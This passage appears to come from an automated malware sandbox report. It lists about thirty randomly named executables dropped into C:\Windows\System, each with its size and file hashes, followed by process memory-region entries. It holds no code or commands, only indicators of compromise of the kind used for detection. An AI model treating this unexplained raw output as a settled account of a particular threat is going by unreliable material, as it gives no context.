SHA5123dfd1cc2a74b35bd7497a4ae24bbf7f01affe501a80e3bf9eb5da1cb71b258d7a22ddbe89182b306c73a45d97e122897d3a23ba6a3e64829e40f0cea21ff8b20
-
C:\Windows\System\ILxUQZF.exeFilesize
1.9MB
MD5ab24e05f660a9c37e8f21813b6813090
SHA17e593e5aee2ebe35f15695f8a95cbfdcb117142d
SHA256c18b480c3ae8e0a39dbcd4ac5884ddc1bcfa6366c2dd17336e9f67cee6e5f3b3
SHA51238495d74ee3320a533a8cce7e7128265892a65cc3985c2c4434e5dca63094726a1173fd6a8e3edcfed3f2843d89ff16943926e360293347ca379911678d6647e
-
C:\Windows\System\KcDVBgi.exeFilesize
1.9MB
MD565c52998f47f9dc07cfdde895ced22b9
SHA1677d11b775a3cf7004f756eaecd042f84fc48f7b
SHA256943ffa275016108ae39c1f14401a423087d6b11b0136b4f90df5ea32ca542c55
SHA5126b086731a83d08b5bb3b9f6942ffbdc2ed4ccf7dc4e9c79be663b57cd1f6e7ffa16aabc79912b4c1db41ab8fb61a19d45b64e37d7fa694b928af1c9c9f029448
-
C:\Windows\System\MZBDbbn.exeFilesize
1.9MB
MD5b146883e7a2e56504e524ac8daf059cd
SHA150701f5f8638802577034c719e4b52cd2b386d8c
SHA2566ca35771b4352e32f075dff00c857cd05150f2c82a80fa09ddd556a9f4515211
SHA512e76e0f655d9ff0a45e74888bed686da2a6d6c0ced24aa842fac08c5f6c071fc799ad34234fab15612c48292d3ef2f57d7ac27ef6f4a502b49ba32157e1f1e6f7
-
C:\Windows\System\NLmhtHW.exeFilesize
1.9MB
MD59a4bab28ca2dac5ae199aed1dcc825fb
SHA151ca9327bd96222833faa9c7061197c137a7c311
SHA25604b84af63e13905970d2058254cd8a051536cb24d4f8257b3e2e1192c73a49dc
SHA512eb4823a9d8f6bcd6ea5d5cb3d4d9007e5407ebbfda2ce45d9f02272d4b0a468edd0e7c8d7513245b95cd4f66443ff5e2720c0054cef5f7b7f1d0f9d3313d5ad9
-
C:\Windows\System\NPFhJtL.exeFilesize
1.9MB
MD5a33ab0683da7b37aba6f5d54a26fc55b
SHA11923adf67c91ddb0864890ecf9c1664ed1633b0c
SHA2563eacf09f1f04ab63a289d71fe7187b08540795b134e7d29429a7efc3e8c69196
SHA5126d2758d8371e071e72e21a886d7744b44452d1986bc217082f36d351dcd1eb7222b76d3662fc56bd1362c73ce9f3ad930af6e649fe8bd5a754e378df92f9fdb7
-
C:\Windows\System\PpQLMbf.exeFilesize
1.9MB
MD59bbf3810be2dd33e3d9c5c679a70809f
SHA177c3a714db8c3aa724acc4b4c30e118357c3cdd6
SHA2562e885b1140f223d015e8f7a261dd00ff49b0dba12d9f288a55f8349f103e17eb
SHA512c3354a8b25a4a945a820b146b5cb4cef17733c5c87001fa16097da7d11baa819242044d71d84c9d8e7ee1208264e61a13c2c60b733f5ee08fb953fa16deec38f
-
C:\Windows\System\RllVBWv.exeFilesize
1.9MB
MD5f18c20704064db09566bf764f3880d52
SHA1b5344933e4ca5c04390f65245c309f464c68ec84
SHA256c0e90400c4523946b0ae664502ea5c687769133bd5b91c78ff1f22547b0e6445
SHA5122a2eea72220597613a69cb4872873a6e3a8b6f3d7a4e3c2801b3eae41e236e8b44600a3b912572101802b687025fcb6ad02dc6d4698a51fa2fecf4c4aa461bb9
-
C:\Windows\System\SrKvmVn.exeFilesize
1.9MB
MD5139cdea51cddc8fc8ec045f4117ce0e2
SHA1f01cedfe9270506497e4c6a61b9c0ef1babdf92b
SHA256d0fe0a9e7454a390bba8230e52df0a6e34335ef7f1c04b53c23a6ba008c0ce1c
SHA512743683c51f018ffed257de64f035a3d156b7476776d0b1a067641e1fae5baf11e5df42333cdd4fe3ad62acc6a86c7701c71c9d7885cc89efed942841cf0a089d
-
C:\Windows\System\YCQPCkW.exeFilesize
1.9MB
MD516818f33304fcb927a5540eb96bb4487
SHA1a62062785d18fed876e2b31af2c0155e94bd71ac
SHA256000a19be00299f625a71b60e9ab07a5a8a82147fabfe7ae35b78b034135f23bb
SHA51278c50ee081d4cd10bad3f680f95dbe31736b0511facf17d536a8b775de630bf71b51c8cab34f1ba28760cbf7fa42d7c20350d419a21353bc31b6168a069f6bc6
-
C:\Windows\System\YCWAzCK.exeFilesize
1.9MB
MD5f9802328548c05b4a89d1dc1f7ad0985
SHA1febf9491670cb0855a551755021edc2ea8011ad6
SHA2562e1e5ad359989d1cc4a26e750b9b25174e63dd83d5dacaf26b07c0514d4b6476
SHA512271be4f542180baaaeb93d922755c082a9ad2f165dcf24e8a174259e035971ab0f4e3e4d2c2050613e94dc68b12a0d9789954579142b2de24b3bffd123698bf4
-
C:\Windows\System\ZjuDlfz.exeFilesize
1.9MB
MD552db41715340e865967945edc5a35523
SHA1dfbbba25df82e1226dc6c691dcbb8d0c7f393aae
SHA256ac58ccc4f584f85aa7ed3745e45a4140fc6393e446b82fab3a0d24ab969fe863
SHA512a5cf32788284d061266a3e3a6ad15098fbeff9fbe08ca2842b4ac481572c846482bb0ce4d9168cba193014789c721a141aa426ab9e50a2fb7fa96100fea5ef5b
-
C:\Windows\System\ZvONovo.exeFilesize
1.9MB
MD533f9cb1dff56dc7520a44a335c82ef70
SHA1a3d5815e18760a9eaf169eccfc3f57c2588273f7
SHA2564abe3ed48173566eecebc5360c681bbc27607af0ded4259ea4b557ea5873bb4b
SHA5128adfa6672578a59bb8f967d96a9c47efdeafd3b3cb836c0f73f0e8195e781ff77aad3604261f096217bfc627bc8579f5c8208f0ff61db091e1d0b56d2295bc72
-
C:\Windows\System\aLVJRel.exeFilesize
1.9MB
MD5a6e9858d8483cf3b103cae81cb7a4481
SHA1183a8192007bdc3164dbd47fdc2f075048a4c45f
SHA256955d628a088f72cb6ec07fa0a80d18436a4f4aec0972c83ccda81553e56d36d7
SHA512a502d2c51907f8dafe93a5a7410b64f833e6a42125ca437aa078f4a9e97e401166f78b8076ba4ad8375c78eb224c3cd11306db876a7076aa592fa9af402e639e
-
C:\Windows\System\dJwAbiB.exeFilesize
1.9MB
MD5416f5317843f1e799d649bce2735fd4a
SHA1070880574cf67c8dcebe76a4dd67e10312656b82
SHA256e9ebd5c728012b8b1b6acfdd90d4bbefd5342a206a6861f8e01fe4e2fc9a94b1
SHA512e65295156e77861566a8796b65326a7f513befd47563bf7f42e06081d774e9e5802b282bdb5705a8bd713ee634fb8d7a1e034eb2bc712323869279e62326ab61
-
C:\Windows\System\dtAAipU.exeFilesize
1.9MB
MD5ac5938c055cb187819837d65847456e9
SHA177e6bb883bc3d539530aac635981adfb17fa70e4
SHA256774ab03c6f6d13d528534e9e16b7ff2af259da01fb1e6bdac4a50d944278a551
SHA512c74c9fea39bc1ed92ff10ff3988c319477d8ddd85a6184eafb0009f1399efe5dfe9adf789282640256e72d8c6d55a476d0870e9eb27145bd2e04905b94f5a898
-
C:\Windows\System\fLuXlFl.exeFilesize
8B
MD50a4d9fd0cc8fe1472d155d5d981ff235
SHA1137003f778b74f1b96494293112b43e4307e765e
SHA2564707e767d70e4899759ce8aba6535007a27f8c132e3f3e05b8b8ae03c23dd080
SHA512ad9c5b802b25d2a28cbec3d4cc246b638fad901bd44704bb559f8a0cf5c0d25f339a2e2fe9f4b8bbba249477fc11b0b14c51d97cfa76d081fb255f90811dd5c7
-
C:\Windows\System\gevnQJc.exeFilesize
1.9MB
MD55c86423f22c5a462d07630f72d646f05
SHA1aef1c1632b852569a535d921a8105a24d9a82cf8
SHA256de009cbae09b38e6c7e649d0513149de88b6311766954f3e5bc290b48b5cc0d1
SHA512c982352996ff216397a2b6c3f80e2536d67d3a1ecea4a5e9eb952575e530f33f27e2d84874f9a3925a788551a405586a44ae0787bb42ed7234e173d37bface26
-
C:\Windows\System\iMwOmKV.exeFilesize
1.9MB
MD5bac1a5a5624190b5bec38c03129d2138
SHA134445e5ead79c10644b97150d6ae5ae21665c733
SHA2568cd7fbab4bc0534ac3d084adff43e4cd54c4565f969e8bd9f73912bdcb70de6c
SHA51204ec8469ec36f575d6599cf24206eb2cf4db801cb0dadd1582a8f95334b41b806116b8af2e2f1d0f8299c716dba5b59fced8ecdf8ecf91ecf64d1c57f1bd051d
-
C:\Windows\System\ihFXJbC.exeFilesize
1.9MB
MD5672db57edca8eb3e7e388deaa2e9e6df
SHA1aefb5746c7e1099c6513a5d8a5940a11fe6ea532
SHA25637f82205f400518880ab02b04750c308cf787aaed30da1f07191a59f59b822cd
SHA51242b5cfcf885e735207cc57632d6a4e29e9dda6dcefe53c28753d929cafe8e9e50696116c1636e3b4317f7132ae88a95a386a387ab913c8b4dc3ae88f3c6f28e6
-
C:\Windows\System\jSBHmVm.exeFilesize
1.9MB
MD566dd81f550f3669a61de4acfee01dd19
SHA1b55dc2527da919faba864df04d948f8f10608761
SHA25651cbfd68d3817bfaaf1bcbbc8b672afe80e2eb954322e9ce8a0ee5b60af2c338
SHA51272039e237e8c48f2e0b472666bd9de2d61f41e67ef00273589fdd3f15361a276775a09be0c74202123c90693bca45372702418bbe142af7b3e56693599f8b91f
-
C:\Windows\System\kniHjbz.exeFilesize
1.9MB
MD59c8921cebc0dc5eca18a60f34ac0738b
SHA11eaf5aac4f931e6a5b9ee9d0b9ae66612078fdb5
SHA256085f0843698f9f336366bd6a930be2a1cc8ec64e28a23d02fb059d6f729d031b
SHA512bd10315b44dfd115d44ab863b1fcd206a5bacc3dc97c3a1e6a975598c4f78d53dc1ac8d58d5461a0487d62526d1a7be6d3a10adf992e86fbe8dcaff9cb759c2b
-
C:\Windows\System\lEphIFM.exeFilesize
1.9MB
MD5147f77c8fc7c2c364087d2b666b4ae3b
SHA1ebccc4124c7bdce211d7da677f8452b37f2be238
SHA2562e93436a9368e105c075c19c03cbe7977c9048989c91a62c4d4843417c53a7de
SHA512f464277c9eb905bdc9050d41b5bf1f502accea2772279dbec5cf8e3c76f45e5b43327ef816817ac5f05b5859a56fabe8d620664b6b6fbb5b8dbbc814ec35f0cc
-
C:\Windows\System\nkRiAVH.exeFilesize
1.9MB
MD588133a83fcbc42d12f8618cd17218107
SHA19caf034410955d311e906e45b458d178b45ce646
SHA256a1af8349e96154dbd6266770140ce27d91a04886b08e1f6f7fc396d1d87f2fc9
SHA512c822e767fcddeb57457f9febea25388315505332a95f70e73d4bbcca3f28fd351f404f165936dda67756dbb06f8a3ebdb89150ed43432a43e8b0da9dcaefa580
-
C:\Windows\System\oJKZSaj.exeFilesize
1.9MB
MD5e377218c180c594bcbf0465f42032f54
SHA1e791740be6902f660c2e65ef3864055f022bf55b
SHA256a8b4696cf2610904c05e5a5591432c00a5c6bcc02f3b2814fbebd9606f2a8b28
SHA51266e6f023b231557c52d45db97c49f58a34d684ded6da580eb048c5b79c7f058a5a40351775b0b0b5f0990df148ac550fd3a9609b4117c94eebeb305d7349a558
-
C:\Windows\System\octEPVJ.exeFilesize
1.9MB
MD584ce75f608420c5f4b9daf759d76918b
SHA193bf5df2049e4f7e0e1828c9711d0b9ca2630fc9
SHA256b8a7aa71db1de689215eed786b137c245419537372a9406bcb0ed67fbf194194
SHA5129f59a8466c30d0ba62f4c4f1b81473276d45952928cc63c68d32d26e658402b542dce3a6ccc23baa9c3531920f6d395e84cd8f3437befd9179bc764665957927
-
C:\Windows\System\pdYcMdK.exeFilesize
1.9MB
MD5c9c87c8ef02d86fc57f8741df2435aaa
SHA1b2ce83eedb88c20fd28cb90e02a03aca1b8e0739
SHA2561bd320b106dda4308bdb3400c344834ad5c0d89ab1c3996c46aac237e3948f0c
SHA51228e716a924c082231a2b1500727f497c2c4f768ac30a27cc8de6d86cb91516640c42ec4ff5112dc92a0edfbb423b90295e7b2231153de0272eebf37b0552e5ff
-
C:\Windows\System\uWZnljm.exeFilesize
1.9MB
MD520cf830d1dd982917b62ba4a903b74c1
SHA1e406194e9c5cbe6c5e995146b524ba31873dae9c
SHA256389febbeb118580fdae21443a55da7f754816eba7c2c373f11f7b3799cb4f509
SHA51285f4d15756dcac7087c26f521bab44d01782e0cb2db3aa2ea8879a39b5536f602b8dd1a8717bff594184684ec00dd1afb93d98567c0f974c8ead401a27572574
-
C:\Windows\System\uqbIoDo.exeFilesize
1.9MB
MD5bd48c55e9c615a55cf1e1c93b9976944
SHA196e89e7ed2e3cc92eb57b8ba9f993ccd67839e27
SHA256a99ddcab9f05cb7f779fbedb8f4b6f88f6941ca6f39eaf502a3d7e57a505ce0e
SHA5126a32b9326b3745c3dfd8f99fa706758db06f1fedde2a6400ce64576301a1b8af805c5d7fe8ace0dce88154a9fdf2d56861b5fd0c977b5a07f4bc72e16b909952
-
C:\Windows\System\xlaKyRL.exeFilesize
1.9MB
MD51948664b3b5ac11dd8a0c982bcdf9426
SHA1a615a28b7e0ceb68a3c64218872000dcb62b3900
SHA256348b0ef9e0fcb0430d5aa20e6a14e70befaa1b3f7f8bcefa1b212d9d62168755
SHA512bd8ae2e7b527b32a9606cb6e3770346180ca3678e1e5e5b421e4e81441a62e07cd7a4385aa36b22fb7a91fb4b97ae4d6afae7038e57ead55383ee8cb50141a78
-
memory/424-97-0x00007FF612080000-0x00007FF612472000-memory.dmpFilesize
3.9MB
-
memory/424-2685-0x00007FF612080000-0x00007FF612472000-memory.dmpFilesize
3.9MB
-
memory/456-85-0x00007FF67ED00000-0x00007FF67F0F2000-memory.dmpFilesize
3.9MB
-
memory/456-2679-0x00007FF67ED00000-0x00007FF67F0F2000-memory.dmpFilesize
3.9MB
-
memory/920-2608-0x00007FF7C4BD0000-0x00007FF7C4FC2000-memory.dmpFilesize
3.9MB
-
memory/920-2671-0x00007FF7C4BD0000-0x00007FF7C4FC2000-memory.dmpFilesize
3.9MB
-
memory/920-37-0x00007FF7C4BD0000-0x00007FF7C4FC2000-memory.dmpFilesize
3.9MB
-
memory/1048-357-0x00007FF64DF80000-0x00007FF64E372000-memory.dmpFilesize
3.9MB
-
memory/1048-2708-0x00007FF64DF80000-0x00007FF64E372000-memory.dmpFilesize
3.9MB
-
memory/1080-2665-0x00007FF79CB50000-0x00007FF79CF42000-memory.dmpFilesize
3.9MB
-
memory/1080-30-0x00007FF79CB50000-0x00007FF79CF42000-memory.dmpFilesize
3.9MB
-
memory/1240-98-0x00007FF64CD00000-0x00007FF64D0F2000-memory.dmpFilesize
3.9MB
-
memory/1240-2683-0x00007FF64CD00000-0x00007FF64D0F2000-memory.dmpFilesize
3.9MB
-
memory/1544-2673-0x00007FF720300000-0x00007FF7206F2000-memory.dmpFilesize
3.9MB
-
memory/1544-2609-0x00007FF720300000-0x00007FF7206F2000-memory.dmpFilesize
3.9MB
-
memory/1544-45-0x00007FF720300000-0x00007FF7206F2000-memory.dmpFilesize
3.9MB
-
memory/1584-354-0x00007FF7D5500000-0x00007FF7D58F2000-memory.dmpFilesize
3.9MB
-
memory/1584-2701-0x00007FF7D5500000-0x00007FF7D58F2000-memory.dmpFilesize
3.9MB
-
memory/1608-93-0x00007FF629E40000-0x00007FF62A232000-memory.dmpFilesize
3.9MB
-
memory/1608-2675-0x00007FF629E40000-0x00007FF62A232000-memory.dmpFilesize
3.9MB
-
memory/1792-0-0x00007FF782DD0000-0x00007FF7831C2000-memory.dmpFilesize
3.9MB
-
memory/1792-1-0x000001FE2A390000-0x000001FE2A3A0000-memory.dmpFilesize
64KB
-
memory/2076-351-0x000001DBDFE30000-0x000001DBE05D6000-memory.dmpFilesize
7.6MB
-
memory/2076-27-0x000001DBC6E30000-0x000001DBC6E40000-memory.dmpFilesize
64KB
-
memory/2076-26-0x000001DBC6E30000-0x000001DBC6E40000-memory.dmpFilesize
64KB
-
memory/2076-25-0x00007FFD6E660000-0x00007FFD6F121000-memory.dmpFilesize
10.8MB
-
memory/2076-24-0x000001DBDF310000-0x000001DBDF332000-memory.dmpFilesize
136KB
-
memory/2076-2650-0x00007FFD6E660000-0x00007FFD6F121000-memory.dmpFilesize
10.8MB
-
memory/2104-62-0x00007FF76D040000-0x00007FF76D432000-memory.dmpFilesize
3.9MB
-
memory/2104-2669-0x00007FF76D040000-0x00007FF76D432000-memory.dmpFilesize
3.9MB
-
memory/2144-101-0x00007FF672E00000-0x00007FF6731F2000-memory.dmpFilesize
3.9MB
-
memory/2144-2690-0x00007FF672E00000-0x00007FF6731F2000-memory.dmpFilesize
3.9MB
-
memory/2308-2691-0x00007FF7D3C00000-0x00007FF7D3FF2000-memory.dmpFilesize
3.9MB
-
memory/2308-2610-0x00007FF7D3C00000-0x00007FF7D3FF2000-memory.dmpFilesize
3.9MB
-
memory/2308-92-0x00007FF7D3C00000-0x00007FF7D3FF2000-memory.dmpFilesize
3.9MB
-
memory/2372-2695-0x00007FF61CDD0000-0x00007FF61D1C2000-memory.dmpFilesize
3.9MB
-
memory/2372-335-0x00007FF61CDD0000-0x00007FF61D1C2000-memory.dmpFilesize
3.9MB
-
memory/2668-88-0x00007FF6112D0000-0x00007FF6116C2000-memory.dmpFilesize
3.9MB
-
memory/2668-2681-0x00007FF6112D0000-0x00007FF6116C2000-memory.dmpFilesize
3.9MB
-
memory/3500-94-0x00007FF6110B0000-0x00007FF6114A2000-memory.dmpFilesize
3.9MB
-
memory/3500-2687-0x00007FF6110B0000-0x00007FF6114A2000-memory.dmpFilesize
3.9MB
-
memory/3888-2667-0x00007FF640370000-0x00007FF640762000-memory.dmpFilesize
3.9MB
-
memory/3888-28-0x00007FF640370000-0x00007FF640762000-memory.dmpFilesize
3.9MB
-
memory/3960-2697-0x00007FF67A100000-0x00007FF67A4F2000-memory.dmpFilesize
3.9MB
-
memory/3960-346-0x00007FF67A100000-0x00007FF67A4F2000-memory.dmpFilesize
3.9MB
-
memory/4112-362-0x00007FF71B600000-0x00007FF71B9F2000-memory.dmpFilesize
3.9MB
-
memory/4112-2710-0x00007FF71B600000-0x00007FF71B9F2000-memory.dmpFilesize
3.9MB
-
memory/4708-2693-0x00007FF719520000-0x00007FF719912000-memory.dmpFilesize
3.9MB
-
memory/4708-327-0x00007FF719520000-0x00007FF719912000-memory.dmpFilesize
3.9MB
-
memory/4996-2677-0x00007FF720AC0000-0x00007FF720EB2000-memory.dmpFilesize
3.9MB
-
memory/4996-74-0x00007FF720AC0000-0x00007FF720EB2000-memory.dmpFilesize
3.9MB
-
memory/5004-353-0x00007FF78AE50000-0x00007FF78B242000-memory.dmpFilesize
3.9MB
-
memory/5004-2699-0x00007FF78AE50000-0x00007FF78B242000-memory.dmpFilesize
3.9MB